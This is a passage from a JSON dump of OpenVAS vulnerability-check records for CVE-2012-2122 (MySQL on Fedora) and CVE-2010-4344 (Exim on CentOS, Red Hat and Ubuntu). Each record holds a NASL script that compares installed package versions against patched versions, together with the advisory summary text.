Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:35:10 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-9324\");\n script_name(\"Fedora Update for mysql FEDORA-2012-9324\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.5.24~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:28", "description": "Check for the Version of exim", "cvss3": {}, "published": "2011-01-31T00:00:00", "type": "openvas", "title": "CentOS Update for exim CESA-2010:0970 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880458", "href": "http://plugins.openvas.org/nasl.php?oid=880458", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for exim CESA-2010:0970 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Exim is a mail transport agent (MTA) developed at the University of\n Cambridge for use on Unix systems connected to the Internet.\n\n A buffer overflow flaw was discovered in Exim's internal\n string_vformat() function. A remote attacker could use this flaw to\n execute arbitrary code on the mail server running Exim. (CVE-2010-4344)\n \n Note: successful exploitation would allow a remote attacker to execute\n arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system that\n is running the Exim mail server. An exploit for this issue is known to\n exist.\n \n For additional information regarding this flaw, along with mitigation\n advice, please see the Knowledge Base article linked to in the\n References section of this advisory.\n \n Users of Exim are advised to update to these erratum packages which\n contain a backported patch to correct this issue. After installing this\n update, the Exim daemon will be restarted automatically.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"exim on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-January/017233.html\");\n script_id(880458);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-31 15:15:14 +0100 (Mon, 31 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0970\");\n script_cve_id(\"CVE-2010-4344\");\n script_name(\"CentOS Update for exim CESA-2010:0970 centos4 i386\");\n\n script_summary(\"Check for the Version of exim\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-doc\", rpm:\"exim-doc~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-mon\", rpm:\"exim-mon~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-sa\", rpm:\"exim-sa~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:05:46", "description": "Check for the Version of exim", "cvss3": {}, "published": "2010-12-28T00:00:00", "type": "openvas", "title": "RedHat Update for exim RHSA-2010:0970-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2018-01-25T00:00:00", "id": "OPENVAS:1361412562310870369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870369", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for exim RHSA-2010:0970-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Exim is a mail transport agent (MTA) developed at the University of\n Cambridge for use on Unix systems connected to the Internet.\n\n A buffer overflow flaw was discovered in Exim's internal\n string_vformat() function. A remote attacker could use this flaw to\n execute arbitrary code on the mail server running Exim. (CVE-2010-4344)\n \n Note: successful exploitation would allow a remote attacker to execute\n arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system that\n is running the Exim mail server. An exploit for this issue is known to\n exist.\n \n For additional information regarding this flaw, along with mitigation\n advice, please see the Knowledge Base article linked to in the\n References section of this advisory.\n \n Users of Exim are advised to update to these erratum packages which\n contain a backported patch to correct this issue. After installing this\n update, the Exim daemon will be restarted automatically.\";\n\ntag_affected = \"exim on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-December/msg00023.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870369\");\n script_version(\"$Revision: 8528 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 08:57:36 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-28 07:11:56 +0100 (Tue, 28 Dec 2010)\");\n script_xref(name: \"RHSA\", value: \"2010:0970-01\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-4344\");\n script_name(\"RedHat Update for exim RHSA-2010:0970-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of exim\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.63~5.el5_5.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.63~5.el5_5.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-mon\", rpm:\"exim-mon~4.63~5.el5_5.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-sa\", rpm:\"exim-sa~4.63~5.el5_5.2\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.43~1.RHEL4.5.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.43~1.RHEL4.5.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-doc\", rpm:\"exim-doc~4.43~1.RHEL4.5.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-mon\", rpm:\"exim-mon~4.43~1.RHEL4.5.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-sa\", rpm:\"exim-sa~4.43~1.RHEL4.5.el4_8.1\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for exim CESA-2010:0970 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881363", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881363", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for exim CESA-2010:0970 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-January/017234.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881363\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:35:40 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2010-4344\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2010:0970\");\n script_name(\"CentOS Update for exim CESA-2010:0970 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"exim on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Exim is a mail transport agent (MTA) developed at the University of\n Cambridge for use on Unix systems connected to the Internet.\n\n A buffer overflow flaw was discovered in Exim's internal\n string_vformat() function. A remote attacker could use this flaw to\n execute arbitrary code on the mail server running Exim. (CVE-2010-4344)\n\n Note: successful exploitation would allow a remote attacker to execute\n arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system that\n is running the Exim mail server. An exploit for this issue is known to\n exist.\n\n For additional information regarding this flaw, along with mitigation\n advice, please see the Knowledge Base article linked to in the\n References section of this advisory.\n\n Users of Exim are advised to update to these erratum packages which\n contain a backported patch to correct this issue. After installing this\n update, the Exim daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-doc\", rpm:\"exim-doc~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-mon\", rpm:\"exim-mon~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-sa\", rpm:\"exim-sa~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:56:34", "description": "Check for the Version of exim", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for exim CESA-2010:0970 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:881363", "href": "http://plugins.openvas.org/nasl.php?oid=881363", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for exim CESA-2010:0970 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Exim is a mail transport agent (MTA) developed at the University of\n Cambridge for use on Unix systems connected to the Internet.\n\n A buffer overflow flaw was discovered in Exim's internal\n string_vformat() function. A remote attacker could use this flaw to\n execute arbitrary code on the mail server running Exim. (CVE-2010-4344)\n\n Note: successful exploitation would allow a remote attacker to execute\n arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system that\n is running the Exim mail server. An exploit for this issue is known to\n exist.\n\n For additional information regarding this flaw, along with mitigation\n advice, please see the Knowledge Base article linked to in the\n References section of this advisory.\n\n Users of Exim are advised to update to these erratum packages which\n contain a backported patch to correct this issue. After installing this\n update, the Exim daemon will be restarted automatically.\";\n\ntag_affected = \"exim on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-January/017234.html\");\n script_id(881363);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:35:40 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2010-4344\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0970\");\n script_name(\"CentOS Update for exim CESA-2010:0970 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of exim\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-doc\", rpm:\"exim-doc~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-mon\", rpm:\"exim-mon~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"exim-sa\", rpm:\"exim-sa~4.43~1.RHEL4.5.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:18:21", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1032-1", "cvss3": {}, "published": "2010-12-28T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 vulnerability USN-1032-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840554", "href": "http://plugins.openvas.org/nasl.php?oid=840554", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1032_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for exim4 vulnerability USN-1032-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sergey Kononenko and Eugene Bujak discovered that Exim did not correctly\n truncate string expansions. A remote attacker could send specially crafted\n email traffic to run arbitrary code as the Exim user, which could also\n lead to root privileges.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1032-1\";\ntag_affected = \"exim4 vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1032-1/\");\n script_id(840554);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-28 07:11:56 +0100 (Tue, 28 Dec 2010)\");\n script_xref(name: \"USN\", value: \"1032-1\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-4344\");\n script_name(\"Ubuntu Update for exim4 vulnerability USN-1032-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 